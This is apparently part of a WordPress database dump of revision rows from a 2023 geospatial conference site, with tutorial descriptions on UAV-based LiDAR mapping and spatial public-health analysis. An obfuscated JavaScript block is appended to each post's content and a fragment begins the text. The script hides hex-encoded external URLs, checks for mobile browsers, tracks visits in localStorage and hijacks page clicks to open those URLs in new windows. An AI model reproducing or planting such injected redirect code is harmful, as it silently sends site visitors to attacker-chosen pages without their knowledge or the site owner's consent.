_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','UAV-based 3D mapping using imaging and LiDAR systems: challenges, data processing, and applications','','inherit','closed','closed','','3701-revision-v1','','','2023-02-05 10:44:23','2023-02-05 10:44:23','',3701,'https://gsw2023.com/?p=3801',0,'revision','',0),
(3802,1,'2023-02-05 10:48:05','2023-02-05 10:48:05','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3702\" img_size=\"1200x1000\"][vc_column_text]</p>\r\n<h5>Instructor</h5>\r\n<h6>Ayman F. Habib</h6>\r\n<h6>Thomas A. Page Professor in Civil Engineering</h6>\r\n<h6>Lyles School of Civil Engineering, Purdue University, USA</h6>\r\n<p>[/vc_column_text][dt_team_masonry img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"71\"][vc_row_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\r\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\">UAV-based 3D mapping using imaging and LiDAR systems: challenges, data processing, and applications</h5>\r\n<p>&nbsp;</p>\r\n<h6><span style=\"font-size: 14pt;\"><strong>Tutorial Scope</strong></span></h6>\r\n<p style=\"text-align: justify;\"><strong>The continuous developments in direct geo-referencing technology (i.e., integrated Global Navigation Satellite Systems – GNSS – and Inertial Navigation Systems – INS) and remote sensing systems (i.e., passive and active imaging sensors in the visible and infrared range – RGB cameras, hyperspectral push-broom scanners, and laser scanning) are providing the professional geospatial community with ever-growing opportunities to generate accurate 3D information with rich set of attributes. These advances are also coupled with improvement in the sensors’ performance, reduction in the associated cost, and miniaturization of such sensors. Aside from the sensing systems, we are also enjoying the emerging of promising platforms such as Uncrewed Aerial Vehicles (UAVs). This tutorial will provide an overview of recent activities focusing on UAV-based mapping while highlighting: 1) algorithmic developments for improved system calibration of multi-sensor/multi-platform UAV-based mapping; 2) challenges facing UAV-based Structure-from-Motion strategies for deriving point clouds from imagery; 3) benefits of integrating imaging and LiDAR systems onboard UAVs;  4) applications of UAV-based remote sensing systems for a wide range of applications including precision agriculture, documentation of crash scenes, shoreline monitoring, digital forestry, and mapping of highway construction work zones; and 5) interactive visualization of multi-sensor/multi-platform/temporal geospatial data for improved comprehension of delivered products from UAV-based mobile mapping systems.</strong></p>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<!-- wp:heading {\"level\":1} --></p>\r\n<h5><span style=\"font-size: 18pt;\"><strong>Instractor BIO</strong></span></h5>\r\n<h5 style=\"text-align: justify;\"><span style=\"font-size: 18pt;\"><strong><!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph --></strong></span></h5>\r\n<p style=\"text-align: justify;\"><span style=\"text-align: justify; font-size: 12pt;\">Dr. Habib is the Thomas A. Page professor of Civil Engineering at Purdue University and the Co-Director of the Civil Engineering Center for Applications of UAS for a Sustainable Environment (CE-CAUSE). He is also the Associate Director of Purdue University’s Joint Transportation Research Program (JTRP). Dr. Habib’s research interests span the fields of terrestrial and aerial mobile mapping systems. He has been focusing on modeling the perspective geometry of non-traditional imaging scanners, automatic matching and change detection, automatic calibration of low-cost digital cameras, object recognition in imagery and point cloud data, LiDAR mapping, and integrating photogrammetric data with other sensors/datasets (e.g., GNSS/INS, GIS databases, multi- and hyper-spectral sensors, and LiDAR). Over the last seven years, he has been involved in the development, integration, and utilization of wheel-based and UAV-based mobile mapping systems for a wide range of applications in precision agriculture, geometric documentation of transportation corridors, digital forestry, crash scene reconstruction, cultural heritage documentation, environmental management, and infrastructure monitoring.</span></p>\r\n<p><!-- /wp:paragraph -->[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','UAV-based 3D mapping using imaging and LiDAR systems: challenges, data processing, and applications','','inherit','closed','closed','','3701-revision-v1','','','2023-02-05 10:48:05','2023-02-05 10:48:05','',3701,'https://gsw2023.com/?p=3802',0,'revision','',0),
(3803,1,'2023-02-05 10:52:55','2023-02-05 10:52:55','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3685\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\"><strong>Public Health Data Handling, Analysis and Visualisation using Spatial Science</strong></h5>\n<h6></h6>\n<h6><strong>Tutorial Topic</strong></h6>\n<p style=\"text-align: justify;\"><strong><span style=\"font-size: 12pt;\">The past century has seen an unprecedented burden of infectious, chronic and vector-borne diseases that threaten the public and global health. There are also direct implications on wildlife populations. Understanding the spatial processes and temporal dynamics are important for guiding policy informed decisions. Policymakers, public health officials, and academic researchers are key stakeholders in the fight against diseases. For instance, the recent COVID-19 pandemic has generated tremendous amount of data which is of prime importance. The availability of spatial tools with analytical &amp; visualization capability provided meaningful insights in handling public health data for scientific understanding of disease trends and patterns. Hence, there is a clear need of simple one-stop solution that is backed by reliable data source.</span></strong></p>\n<p style=\"text-align: justify;\"><strong><span style=\"font-size: 12pt;\">In this tutorial, we focus on techniques and spatial tools for (i) optimal data collection on disease occurrence and surveillance through citizen-centric approach, (ii) machine learning based statistical modelling tools for active surveillance, and (iii) analysing the spatial complexity of diseases through visualization support.</span></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\">Short Profile &amp; Affiliation of Instructors</h4>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"70\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 